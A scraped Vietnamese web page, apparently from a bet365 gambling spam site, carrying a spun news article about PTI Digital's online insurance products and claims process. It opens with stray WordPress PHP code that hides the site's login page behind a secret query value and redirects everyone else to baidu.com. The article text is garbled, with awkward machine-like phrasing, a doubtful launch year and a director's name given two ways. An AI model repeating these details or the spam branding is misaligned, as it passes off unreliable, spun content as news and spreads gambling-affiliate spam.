//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } PTI Digital mang đến trải nghiệm mới cho người mua bảo hiểm | bet365 việt nam_địa chỉ liên kết bet365_cách vào bet365

PTI Digital mang đến trải nghiệm mới cho người mua bảo hiểm

Là một bộ phận của công ty bảo hiểm bưu điện, công ty bảo hiểm thời đại kỹ thuật số (PTI Digital) sẽ kinh doanh trên hai nền tảng: qua điện thoại (bán hàng qua điện thoại) và môi trường trực tuyến (kinh doanh theo mạng). Trong số đó, kinh doanh theo mạng sẽ trở thành một hoạt động chủ đạo trong tương lai. Mục tiêu mang lại trải nghiệm mới cho khách hàng thông qua các dòng sản phẩm mới, kênh bán hàng khổng lồ, tiện lợi và thủ tục đền bù đơn giản.

PTI là viết tắt của sự khởi đầu kinh doanh PTI Digital. – Sự ra mắt của một số dòng sản phẩm mới do PTI đưa ra vào năm 2006 bao gồm: chuyến bay bị hoãn và chuyến hàng trả lại. Với việc sử dụng sản phẩm bị chậm chuyến bay, khi chuyến bay bị chậm từ 1 tiếng trở lên, khách hàng sẽ được bồi thường, và số tiền bồi thường có thể lên tới 1,6 triệu đồng.

Sản phẩm trả lại cũng được các sàn thương mại điện tử và các ứng dụng bán hàng trực tuyến đón nhận. Nếu khách hàng trả lại hàng đã đặt, PTI đảm bảo sẽ hoàn trả toàn bộ chi phí vận chuyển cho người bán.

Dòng sản phẩm mới dành riêng cho các kênh trực tuyến, vì vậy PTI sẽ hợp tác chặt chẽ với các công ty công nghệ để tăng cường hợp tác bán hàng, từ đó củng cố hình thức hợp tác, và mang lại trải nghiệm khác biệt cho khách hàng thông qua công nghệ bảo hiểm đang phát triển nhanh chóng. Trong vài phút nữa, toàn bộ giao dịch mua bảo hiểm sẽ được hoàn tất và chứng chỉ điện tử sẽ được cấp cho khách hàng ngay lập tức.

Sự hợp tác giữa PTI và các công ty công nghệ không chỉ dừng lại ở việc phát triển sản phẩm mới mà còn mang lại kinh nghiệm để tích cực thực hiện các hoạt động giám định và bồi thường. Ví dụ, đối với sản phẩm chuyến bay bị hoãn, khi chuyến bay cất cánh chậm hơn dự kiến, khách hàng chỉ cần chụp lại thẻ lên máy bay. Hệ thống sẽ ngay lập tức tự động kết nối với hãng trong vòng 15 phút, xác thực thông tin và bồi thường cho khách hàng.

Bà Hoàng Thị Yến, Giám đốc Công ty PTI Digital cho biết, nếu như trước đây, khi xem xét bảo hiểm, nhiều người sẽ nghĩ đến thủ tục giấy tờ phức tạp thì các sản phẩm, dịch vụ do PTI Digital cung cấp sẽ mang đến cho khách hàng sự nhanh chóng và thuận tiện Và một trải nghiệm thú vị. Nó giúp thay đổi thói quen sử dụng dịch vụ bảo hiểm.

“Trong kỷ nguyên sắp tới, PTI Digital sẽ tiếp tục xây dựng hệ sinh thái sản phẩm bảo hiểm trong môi trường kỹ thuật số, đơn giản hóa mọi thứ. Chương trình cho phép mọi khách hàng dễ dàng mua các sản phẩm bảo hiểm có thể đáp ứng được nhu cầu của họ”, bà Yan nói .

Nam An

Leave a comment

bet365 việt nam_địa chỉ liên kết bet365_cách vào bet365